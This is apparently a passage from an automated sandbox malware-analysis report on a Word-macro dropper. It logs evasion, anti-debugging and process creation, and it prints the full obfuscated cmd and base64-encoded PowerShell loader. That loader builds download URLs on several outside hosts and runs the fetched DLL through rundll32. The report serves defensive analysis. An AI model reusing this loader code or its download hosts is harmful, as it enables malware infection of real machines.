Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2420

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00433278 mov eax, dword ptr fs:[00000030h]	7_2_00433278
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001727EC mov eax, dword ptr fs:[00000030h]	7_2_001727EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00403278 mov eax, dword ptr fs:[00000030h]	8_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001F27EC mov eax, dword ptr fs:[00000030h]	8_2_001F27EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00283278 mov eax, dword ptr fs:[00000030h]	9_2_00283278
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_003427EC mov eax, dword ptr fs:[00000030h]	9_2_003427EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002B3278 mov eax, dword ptr fs:[00000030h]	10_2_002B3278
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E27EC mov eax, dword ptr fs:[00000030h]	10_2_001E27EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00403278 mov eax, dword ptr fs:[00000030h]	11_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001C27EC mov eax, dword ptr fs:[00000030h]	11_2_001C27EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001E3278 mov eax, dword ptr fs:[00000030h]	12_2_001E3278
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001627EC mov eax, dword ptr fs:[00000030h]	12_2_001627EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F27EC mov eax, dword ptr fs:[00000030h]	13_2_001F27EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001B3278 mov eax, dword ptr fs:[00000030h]	14_2_001B3278
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_002B27EC mov eax, dword ptr fs:[00000030h]	14_2_002B27EC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 190.55.186.229 80

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3AC